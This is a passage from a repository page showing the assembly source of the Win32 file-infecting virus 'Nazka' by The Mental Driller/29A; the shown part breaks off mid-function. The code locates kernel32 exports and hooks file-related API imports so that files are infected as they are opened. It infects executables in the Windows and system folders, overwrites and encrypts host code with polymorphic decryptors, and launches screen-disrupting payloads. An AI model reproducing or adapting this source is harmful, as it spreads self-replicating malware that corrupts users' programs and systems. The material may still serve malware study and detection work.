-
Notifications
You must be signed in to change notification settings - Fork 34
Expand file tree
/
Copy pathVirus.Win32.Nazka.528
More file actions
1922 lines (1742 loc) · 68.2 KB
/
Virus.Win32.Nazka.528
File metadata and controls
1922 lines (1742 loc) · 68.2 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
.386p ;;;;;;;;;;;; Virus NAZKA ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
.model flat ;;;;;; by The Mental Driller/29A ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
locals ;;;;;;;;;;; ------------------------- ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
.data ;;;;;;;;;;;; Infection is as follows: ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
;;;;;;;;;;;;;;;;;; - Decryptor in .code section ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
ÛÜ Û ;;;;;;;;;;;;; - Virus in .reloc section
ÛßÛÛ ;;;;;;;;;;;;; - Original overwritten code at the end of the last section
Û Û ;;;;;;;;;;;;; After decryption:
;;; ÜÜÜ ;;;;;;;;;; - Restoring of the overwritten code with WriteProcessMemory
;;; ÛÜÛ ;;;;;;;;;; Achievements with this type of infection:
;;; Û Û ;;;;;;;;;; - .code section mantains original flags
;;;;;; ÜÜÜ ;;;;;;; - .reloc section (which no longer is named so) can be a
;;;;;; Üß ;;;;;;; "strange" section of an executable, with EXEC_WRI_READ
;;;;;; ÛÜÜ ;;;;;;; flags
;;;;;;;;; Ü Ü ;;;; - Original host code is saved and encrypted at the end of
;;;;;;;;; ÛÜß ;;;; the host.
;;;;;;;;; Û Û ;;;;
;;;;;;;;;;;; ÜÜÜ ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;; ÛÜÛ ;by;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;; Û Û ;The Mental Driller/29A;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; All the virus is intended to be full compatible with future versions of ;;;;
;; win32 (I mean, I don't use strange things like the VxDCALL0 or ring-0 int ;;
;; callgates, due to the fact that they are exploits, after all, and they can ;
;; be fixed in future versions of the kernel). ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; This virus isn't very good, but I had to made something to probe that I ;;;;
;; can actually code under Win32 systems, and this virus is a look-a-like of ;;
;; a most advanced version that I'm thinking on, making complex-as-the-fuck ;;;
;; decryptors (that's the reason why I save 1000h bytes of code of .text in ;;;
;; the infections, just to test the technique). ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; The virus has two parts: the first sets a per-process residency catching ;;;
;; some common functions to open files, and GetProcAddress to return our ;;;;;;
;; handled address just in case the application uses the function. The second ;
;; part is a runtime infection, which infects all EXEs, SCRs and CPLs on ;;;;;;
;; current, system and windows directory (as always). ;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; PAYLOADS ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; This virus has 3 different payloads based on the GDI library: ;;;;;;;;;;;;;;
;; 1) Draws NAZKA in the desktop with colorful polygons and displays a message;
;;;; box which can't be closed :) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; 2) Writes "N A Z K A" with the TextOutA function in random positions all ;;;
;;;; over the screen, covering all the desktop. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; 3) The same as 2, but this time with random-color pixels, with the function;
;;;; SetPixel. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; This payloads are spawned in a different thread, so they act while the ;;;;;
;;; application runs. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; POLYMORPHISM ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; The virus is slightly polymorphic, it means, the decryptors are easy to ;;;;
;;; emulate and all that, but I didn't want to leave the virus "nude", and a ;;
;;; single fixed decryptor didn't like me at all. Well, this type of polymor- ;
;;; phism don't like me very much either, but I'm still (!!) working on the ;;;
;;; Tuareg, which will be finished in two or three years :P. ;;;;;;;;;;;;;;;;;;
;; The engine will create three polymorphic decryptors in the beginning of ;;;;
;;; the .text section, and will decrypt the .reloc section (where the virus ;;;
;;; is). ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; I have to apologize because I didn't comment very much of the code. ;;;;;;;;
;; Instead of it, I intend to put names to the functions and labels to be ;;;;;
;; quite explicit (it's my habit lastly), so I hope there isn't many problems ;
;; It's quickly coded also, so many buffer variables are between code instead ;
;; of using the more elegant technique of allocate some local memory for ;;;;;;
;; variables and all that. Maybe in future versions... ;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Message on first generation
Titulo db 'Virus NAZKA 1st Generation by The Mental Driller/29A',0
Mensaje db 'You have been infected with the first generation',0dh,0ah
db 'of the virus NAZKA by The Mental Driller/29A',0
.code
extrn ExitProcess:PROC
extrn MessageBoxA:PROC
Virus_Size equ offset End_Virus - offset Inic_Virus
Encrypted_Virus_Size equ Virus_Size
Nazka proc
Inic_Virus label dword
push eax ; Size to store the return address
pusha
call GetDeltaOffset
GetDeltaOffset: pop ebp
sub ebp, offset GetDeltaOffset
mov [ebp+DeltaOffset], ebp
mov [ebp+DeltaOffset2], ebp
;; Put the return address
mov eax, [ebp+InicIP]
mov [esp+20h], eax
mov byte ptr [ebp+CounterOfFunctions], 0
mov eax, [esp+24h]
and eax, 0FFFFF000h
mov dword ptr [ebp+Addr_Kernel32], eax
mov dword ptr [ebp+AuxCounter], 100h
lea eax, [ebp+offset @@Loop_001]
mov dword ptr [ebp+SEHReturn], eax
push offset MySEH ; Setup SEH for preventing
push dword ptr fs:[0] ; reading exceptions
mov fs:[0], esp
@@Loop_001: sub dword ptr [ebp+Addr_Kernel32], 1000h
mov eax, [ebp+Addr_Kernel32]
cmp word ptr [eax], 'ZM'
jz @@MaybeKernelFound
dec dword ptr [ebp+AuxCounter]
jnz @@Loop_001
push ds
pop ax
cmp ax, 0137h
jb @@JumpToHost2 ; No hard-coded address for WinNT
mov eax, 0BFF70000h ; Hard-coded under Win9x
jmp @@KernelFound2
@@MaybeKernelFound:
mov ebx, [eax+3Ch]
add ebx, eax
cmp word ptr [ebx], 'EP'
jnz @@Loop_001
@@KernelFound2: pop dword ptr fs:[0] ; Restore SEH
pop ecx ; Eliminate our handler from stack
mov ebx, [ebx+78h]
add ebx, eax
mov ecx, [ebx+18h]
mov esi, [ebx+20h]
add esi, eax
@@Loop_003: mov edi, [esi]
add edi, eax
cmp dword ptr [edi], 'PteG'
jnz @@Next_001
cmp dword ptr [edi+4], 'Acor'
jnz @@Next_001
cmp dword ptr [edi+8], 'erdd'
jnz @@Next_001
cmp word ptr [edi+0Ch], 'ss'
jnz @@Next_001
cmp byte ptr [edi+0Eh], 0
jz @@GetProcAddressFound
@@Next_001: add esi, 4
loop @@Loop_003
jmp @@JumpToHost
@@GetProcAddressFound:
sub ecx, [ebx+18h]
neg ecx
shl ecx, 1
add ecx, [ebx+24h]
add ecx, eax
movzx ecx, word ptr [ecx]
shl ecx, 2
add ecx, [ebx+1Ch]
add ecx, eax
mov ecx, [ecx]
add ecx, eax
mov dword ptr [ebp+RVA_GetProcAddress], ecx
lea esi, [ebp+CrunchedASCIIs]
mov edx, [ebp+Addr_Kernel32]
mov [ebp+ModuleToUse], edx
lea edx, [ebp+RVAs]
call GetRVAs
jc @@JumpToHost
;; Let's patch the import directory
;; I also use the Jacky Qwerty's idea of patch the GetProcAddress function
;; (implemented in Win32.Cabanas) to catch the functions that many
;; applications obtain via GetProcAddress
call PatchImportDirectory
;; All RVAs got!
;; Let's infect directories
call RuntimeInfection
;; The payloads! Nice GDI routines spawned in a thread, so they are acting
;; while the process is active. There are three payloads:
;; 1) Draws "NAZKA" with colorful letters and rotates the color of them every
;; tenth of second.
;; 2) Writes "N A Z K A" all over the screen with green text letters and in
;; random positions, covering completely the desktop in a few time :)
;; 3) The same as 2 but with pixels instead of text.
call Payload
@@JumpToHost: cmp dword ptr [ebp+CounterOfFunctions], 2
jb @@SimulateExecError
call dword ptr [ebp+RVA_GetCurrentProcess]
push 0
push 1000h
lea ebx, [ebp+End_Virus]
push ebx
mov ebx, [ebp+RestoreAddress]
push ebx
push eax
call dword ptr [ebp+RVA_WriteProcessMemory]
popa
ret
@@SimulateExecError:
push 00BFF700h ; Construct NOP/MOV BYTE PTR [BFF70000],0
push 0005C690h ; to generate an exception from an "unknown
jmp esp ; module" :)
@@JumpToHost2: pop dword ptr fs:[0] ; Restore original SEH
pop eax
jmp @@JumpToHost
Nazka endp
InicIP dd offset FakedHost
RestoreAddress dd offset FakedHost
CounterOfFunctions db 0
MySEH proc
mov esp, [esp+8] ; Exception? Restore and jump to the
db 0BDh ; specified address
DeltaOffset dd 0
jmp [ebp+SEHReturn]
MySEH endp
SEHReturn dd 0
AuxCounter dd 0
GetRVAs proc
@@Loop_004: lea edi, [ebp+DecrunchBuffer]
push edx
push edi
@@Loop_005: lodsb
push esi
;; 0F0h --> Create
;; 0F1h --> File
;; 0F2h --> Get
;; 0F3h --> DirectoryA
;; 0F4h --> Find
;; 0F5h --> Process
;; 0F6h --> Set
;; 0F7h --> AttributesA
cmp al, 0F6h
ja @@PutAttributesA
jz @@PutSet
cmp al, 0F4h
ja @@PutProcess
jz @@PutFind
cmp al, 0F2h
ja @@PutDirectory
jz @@PutGet
cmp al, 0F0h
ja @@PutFile
jb @@PutDirect
@@PutCreate: lea esi, [ebp+ASC_Create]
mov ecx, 6
jmp @@Store
@@PutFile: mov eax, 'eliF'
stosd
jmp @@Next_002
@@PutGet: lea esi, [ebp+ASC_Get]
mov ecx, 3
jmp @@Store
@@PutDirectory: lea esi, [ebp+ASC_DirectoryA]
mov ecx, 0Ah
jmp @@Store
@@PutFind: mov eax, 'dniF'
stosd
jmp @@Next_002
@@PutProcess: lea esi, [ebp+ASC_Process]
mov ecx, 7
jmp @@Store
@@PutSet: lea esi, [ebp+ASC_Set]
mov ecx, 3
jmp @@Store
@@PutAttributesA: lea esi, [ebp+ASC_AttributesA]
mov ecx, 0Bh
@@Store: rep movsb
jmp @@Next_002
@@PutDirect: stosb
@@Next_002: pop esi
or al, al
jnz @@Loop_005
push dword ptr [ebp+ModuleToUse]
call dword ptr [ebp+RVA_GetProcAddress]
pop edx
or eax, eax
jz @@Error
mov [edx], eax
inc byte ptr [ebp+CounterOfFunctions]
add edx, 4
cmp byte ptr [esi], 0
jnz @@Loop_004
clc
ret
@@Error: stc
ret
GetRVAs endp
ModuleToUse dd 0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
;; PER-PROCESS RESIDENCY: SETTING AND INFECTION
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
PatchImportDirectory proc
db 0B8h ; MOV EAX,xxxxxxxx
ImageBase dd 400000h ; Image base, set on infection time
mov ebx, [eax+3Ch]
add ebx, eax
cmp word ptr [ebx], 'EP'
jnz @@End
mov ecx, [ebx+84h]
mov ebx, [ebx+80h]
add ebx, eax
@@SearchModule: mov esi, [ebx+0Ch]
or esi, esi
jz @@End
add esi, eax
@@ToLowerCase: mov edx, [esi]
call ToLower
cmp edx, 'nrek'
jnz @@NextModule
mov edx, [esi+4]
call ToLower
cmp edx, '23le'
jz @@Found
@@NextModule: add ebx, 14h
sub ecx, 14h
jnz @@SearchModule
jmp @@End
@@Found: mov esi, [ebx+10h]
add esi, eax
cld
lea ebx, [ebp+FunctionsToPatch]
@@Loop_001: mov edi, ebx
lodsd
or eax, eax
jz @@End
mov ecx, 0Fh
repnz scasd
jnz @@Loop_001
sub edi, ebx
mov eax, [ebp+edi+FunctionsAddress-4]
add eax, ebp
mov [esi-4], eax
jmp @@Loop_001
@@End: ret
PatchImportDirectory endp
FunctionsAddress label dword
dd offset My_GetProcAddress
dd offset My_CreateFileA
dd offset My_CreateProcessA
dd offset My_FindFirstFileA
dd offset My_FindNextFileA
dd offset My_GetFileAttributesA
dd offset My_SetFileAttributesA
dd offset My_GetFullPathNameA
dd offset My_MoveFileA
dd offset My_CopyFileA
dd offset My_DeleteFileA
dd offset My_WinExec
dd offset My__lopen
dd offset My_MoveFileExA
dd offset My_OpenFile
;,,,,,,,,,,,,,,,,,,,,,,,,,
;; PER-PROCESS FUNCTIONS ;
;'''''''''''''''''''''''''
GetDelta proc
mov eax, 12345678h
org $-4
DeltaOffset2 dd 0
ret
GetDelta endp
My_GetProcAddress proc
call GetDelta
push ecx
add eax, offset @@ReturnHere
mov ecx, eax
xchg eax, [esp+4]
mov [ecx+1], eax
pop ecx
call GetDelta
mov eax, [eax+RVA_GetProcAddress]
jmp eax
@@ReturnHere: db 68h
ReturnGetProcAddress dd 0
or eax, eax
jz @@Return
pusha
push eax
call GetDelta
xchg ebp, eax
pop eax
lea esi, [ebp+RVAs]
lea edi, [ebp+RVAs+0Eh*4]
mov ebx, esi
xchg ecx, eax
@@Loop_GPA: lodsd
cmp eax, ecx
jnz @@Next_GPA
sub esi, ebx
add esi, ebp
mov eax, [esi+FunctionsAddress+4]
mov [esp+1Ch], eax ; Substitute EAX to function
; by our function address
jmp @@Return2
@@Next_GPA: cmp esi, edi
jnz @@Loop_GPA
@@Return2: popa
@@Return: ret ; Ufffh... I hope this work
My_GetProcAddress endp ; (later) It worked! :)
My_CreateFileA proc
call GetDelta
mov eax, [eax+RVA_CreateFileA]
jmp InfectByPerProcess
My_CreateFileA endp
InfectByPerProcess proc
push eax
pusha
call GetDelta
xchg ebp, eax
mov ebx, [esp+28h]
lea eax, [ebp+FindFileField]
push eax
push ebx
call dword ptr [ebp+RVA_FindFirstFileA]
inc eax
jz @@Return
dec eax
push eax
call InfectFile
call dword ptr [ebp+RVA_FindClose]
@@Return: popa
ret ; Jump to kernel function
InfectByPerProcess endp
My_CreateProcessA proc
call GetDelta
mov eax, [eax+RVA_CreateProcessA]
jmp InfectByPerProcess
My_CreateProcessA endp
FindFirstIdent db 0
My_FindNextFileA proc
call GetDelta
mov byte ptr [eax+FindFirstIdent], 0
jmp Common_FindFile
My_FindNextFileA endp
My_FindFirstFileA proc
call GetDelta
mov byte ptr [eax+FindFirstIdent], 1
Common_FindFile: add eax, offset @@ReturnHere
push ecx
mov ecx, eax
xchg eax, [esp+4]
mov [ecx+1], eax
mov eax, [esp+0Ch] ; We put the buffer address...
mov [ecx+0Dh], eax ; ...here
pop ecx
call GetDelta
cmp byte ptr [eax+FindFirstIdent], 1
jz @@PutFindFirst
@@PutFindNext: mov eax, [eax+RVA_FindNextFileA]
jmp eax
@@PutFindFirst: mov eax, [eax+RVA_FindFirstFileA]
jmp eax
@@ReturnHere: db 68h ; PUSH Value
dd 0 ; +1
pusha ; +5
inc eax ; +6
jnz @@ItsOK ; +7
dec eax ; +9
jmp @@Return ; +A
@@ItsOK: db 0BEh ; MOV ESI,Value ; +C
@@ESIValue: dd 0 ; +D
call GetDelta
xchg ebp, eax
lea edi, [ebp+FindFileField]
mov ecx, FindFileFieldSize
cld
rep movsb
dec byte ptr [ebp+InfectFileNow]
jnz @@Return
mov byte ptr [ebp+InfectFileNow], 3
call InfectFile
@@Return: popa
ret
My_FindFirstFileA endp
InfectFileNow db 3
My_GetFileAttributesA proc
call GetDelta
mov eax, [eax+RVA_GetFileAttributesA]
jmp InfectByPerProcess
My_GetFileAttributesA endp
My_SetFileAttributesA proc
call GetDelta
mov eax, [eax+RVA_SetFileAttributesA]
jmp InfectByPerProcess
My_SetFileAttributesA endp
My_GetFullPathNameA proc
call GetDelta
mov eax, [eax+RVA_GetFullPathNameA]
jmp InfectByPerProcess
My_GetFullPathNameA endp
My_MoveFileA proc
call GetDelta
mov eax, [eax+RVA_MoveFileA]
jmp InfectByPerProcess
My_MoveFileA endp
My_CopyFileA proc
call GetDelta
mov eax, [eax+RVA_CopyFileA]
jmp InfectByPerProcess
My_CopyFileA endp
My_DeleteFileA proc
call GetDelta
mov eax, [eax+RVA_DeleteFileA]
jmp InfectByPerProcess
My_DeleteFileA endp
My_WinExec proc
call GetDelta
mov eax, [eax+RVA_WinExec]
jmp InfectByPerProcess
My_WinExec endp
My__lopen proc
call GetDelta
mov eax, [eax+RVA__lopen]
jmp InfectByPerProcess
My__lopen endp
My_MoveFileExA proc
call GetDelta
mov eax, [eax+RVA_MoveFileExA]
jmp InfectByPerProcess
My_MoveFileExA endp
My_OpenFile proc
call GetDelta
mov eax, [eax+RVA_OpenFile]
jmp InfectByPerProcess
My_OpenFile endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;
;;; RUN-TIME INFECTION
;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
RuntimeInfection proc
call InfectCurrentDir
push 80h
lea eax, [ebp+Directory2]
push eax
call dword ptr [ebp+RVA_GetCurrentDirectoryA]
call InfectWindowsDir
call InfectSystemDir
lea eax, [ebp+Directory2]
push eax
call dword ptr [ebp+RVA_SetCurrentDirectoryA]
ret
RuntimeInfection endp
Directory1 db 80h dup (0)
Directory2 db 80h dup (0)
InfectSystemDir proc
mov ebx, [ebp+RVA_GetSystemDirectoryA]
Common_InfectDir:
push 80h
lea eax, [ebp+Directory1]
push eax
call ebx
or eax, eax
jz @@Return
call SetDirectory1
call InfectCurrentDir
@@Return: ret
InfectSystemDir endp
InfectWindowsDir proc
mov ebx, [ebp+RVA_GetWindowsDirectoryA]
jmp Common_InfectDir
InfectWindowsDir endp
SetDirectory1 proc
lea eax, [ebp+Directory1]
push eax
call dword ptr [ebp+RVA_SetCurrentDirectoryA]
ret
SetDirectory1 endp
InfectCurrentDir proc
call DeleteDATs
lea ecx, [ebp+FindFileMask1]
call InfectCurrentDir2
lea ecx, [ebp+FindFileMask2]
call InfectCurrentDir2
lea ecx, [ebp+FindFileMask3]
call InfectCurrentDir2
ret
InfectCurrentDir endp
InfectCurrentDir2 proc
lea ebx, [ebp+FindFileField]
push ebx
push ecx
call dword ptr [ebp+RVA_FindFirstFileA]
inc eax
jz @@Fin0
dec eax
mov dword ptr [ebp+FindFileHandle], eax
@@InfectAgain: call InfectFile
lea ebx, [ebp+FindFileField]
push ebx
push dword ptr [ebp+FindFileHandle]
call dword ptr [ebp+RVA_FindNextFileA]
or eax, eax
jnz @@InfectAgain
push dword ptr [ebp+FindFileHandle]
call dword ptr [ebp+RVA_FindClose]
@@Fin0: ret
InfectCurrentDir2 endp
FindFileHandle dd 0
InfectFile proc
mov ebx, [ebp+CreationTime]
and ebx, 3
cmp bl, 3
jz @@End ; Infection mark
lea ebx, [ebp+FileName]
call CheckFileName
jc @@End
push 80h
push ebx
call dword ptr [ebp+RVA_SetFileAttributesA]
call OpenFile
jc @@End2
call MapFile
or eax, eax
jz @@End3
mov dword ptr [ebp+MappingAddress], eax
mov edi, eax
cmp word ptr [edi], 'ZM'
jnz @@End4
; cmp word ptr [edi+12h], 'DM'
; jz @@End4
mov esi, [eax+3Ch]
add esi, edi
mov [ebp+PEHeaderAddress], esi
cmp word ptr [esi], 'EP'
jnz @@End4
;; ESI=Header address, EDI=Mapping address (beginning of file)
;; Manner of infecting the file:
;; 1) The section .reloc is anulated
;; 2) We check if reloc is quite big to contain the virus. If not, we exit
;; 3) We copy from .text to the end of the last section the portion of code
;; that is going to be overwritten
;; 4) We copy the virus to .reloc and we change the name of the section by
;; another randomly generated
;; 5) We overwrite .text section with the decryptor (we check if .text is big
;; enough to contain this).
;; 6) When execution, .text must be restored from the saved data. All other
;; things (reloc, etc.) can remain.
movzx ebx, word ptr [esi+14h]
movzx ecx, word ptr [esi+06h]
lea ebx, [ebx+esi+18h]
mov eax, 28h
push ebx
push ecx
dec ecx
mul ecx
add ebx, eax
sub ebx, edi
mov [ebp+LastHeader], ebx ; In EBX, the physical address
; of the header of the last section
pop ecx
pop eax
mov dword ptr [ebp+TextHeader], 0
mov dword ptr [ebp+RelocHeader], 0
@@Loop_001: cmp dword ptr [eax], 'xet.'
jnz @@LookForReloc
cmp dword ptr [eax+4], 0+'t'
jnz @@NextSection
sub eax, edi
mov [ebp+TextHeader], eax ; Physical address of .text
add eax, edi
jmp @@NextSection
@@LookForReloc: cmp dword ptr [eax], 'ler.'
jnz @@NextSection
cmp dword ptr [eax+4], 0+'co'
jnz @@NextSection
sub eax, edi
mov [ebp+RelocHeader], eax ; Physical address of .reloc
add eax, edi
@@NextSection: add eax, 28h
loop @@Loop_001
cmp [ebp+TextHeader], ecx ; 0?
jz @@End4
mov eax, [ebp+RelocHeader]
or eax, eax
jz @@End4
cmp eax, [ebp+LastHeader] ; Is last section the reloc?
jnz @@End4 ; If it isn't, exit
mov dword ptr [esi+98h], 0
mov dword ptr [esi+9Ch], 0 ; Anulate relocs
mov eax, [esi+28h]
mov ebx, [esi+34h]
add eax, ebx
mov [ebp+InicIP], eax
mov [ebp+ImageBase], ebx
mov eax, [ebp+TextHeader]
add eax, edi
cmp dword ptr [eax+08h], 1000h
jb @@End4
cmp dword ptr [eax+10h], 1000h
jb @@End4
mov eax, [ebp+RelocHeader]
add eax, edi
mov ebx, Virus_Size+1000h
cmp dword ptr [eax+08h], ebx
jae @@SizeIsOK_1
mov dword ptr [eax+08h], ebx
@@SizeIsOK_1: cmp dword ptr [eax+10h], ebx
jae @@SizeIsOK_2
@@SizeIsNotOK: sub ebx, [eax+10h]
mov ecx, eax
xchg ebx, eax
mov ebx, [esi+38h]
xor edx, edx
div ebx
inc eax
mul ebx
add [ecx+10h], eax
add [ebp+FileSizeLow], eax
add [esi+50h], eax
call UnmapFile
call MapFile
or eax, eax
jz @@End3
mov dword ptr [ebp+MappingAddress], eax
mov edi, eax
mov esi, [edi+3Ch]
add esi, edi
@@SizeIsOK_2:
;; This must be sustituted by an entrypoint to the very
;; beginning of the .text section. This time (to test) we
;; set the entrypoint at the beginning of the .reloc section
;; (last section)
mov eax, [ebp+TextHeader]
add eax, edi
mov ebx, [eax+0Ch]
mov [esi+28h], ebx
add ebx, [esi+34h]
mov [ebp+RestoreAddress], ebx
mov ecx, [eax+14h]
add ecx, edi
mov eax, [ebp+RelocHeader]
add eax, edi
or dword ptr [eax+24h], 0A0000020h
; mov eax, [eax+0Ch]
; mov [esi+28h], eax
call ConstructNameForReloc
push edi
xchg edi, eax
mov edi, [ebp+RelocHeader]
add edi, eax
mov edi, [edi+14h]
add edi, eax
push esi
lea esi, [ebp+Nazka]
mov ecx, Virus_Size / 4
push eax
call CreateEncryptions
call EncryptWhileStoring
pop eax
mov esi, [ebp+TextHeader]
add esi, eax
mov esi, [esi+14h]
add esi, eax
mov ecx, 400h
call EncryptWhileStoring
pop esi
pop edi
; mov word ptr [edi+12h], 'DM'
mov eax, [ebp+TextHeader]
add eax, edi
mov ebx, [eax+0Ch]
add ebx, [esi+34h]
mov ecx, [eax+14h]
add ecx, edi
mov eax, [ebp+RelocHeader]
add eax, edi
mov eax, [eax+0Ch]
add eax, [esi+34h]
sub eax, ebx
; sub eax, 5
; EAX=Displacement from the beginning till the virus
; ECX=Place where the decryptors must be put
; Size of encrypted part is Virus_Size+1000h
call PutDecryptors
; mov byte ptr [ecx], 0E9h
; mov dword ptr [ecx+1], eax
or dword ptr [ebp+CreationTime], 3
@@End4: call UnmapFile
@@End3: call RestoreDateTime
push dword ptr [ebp+FileHandle]
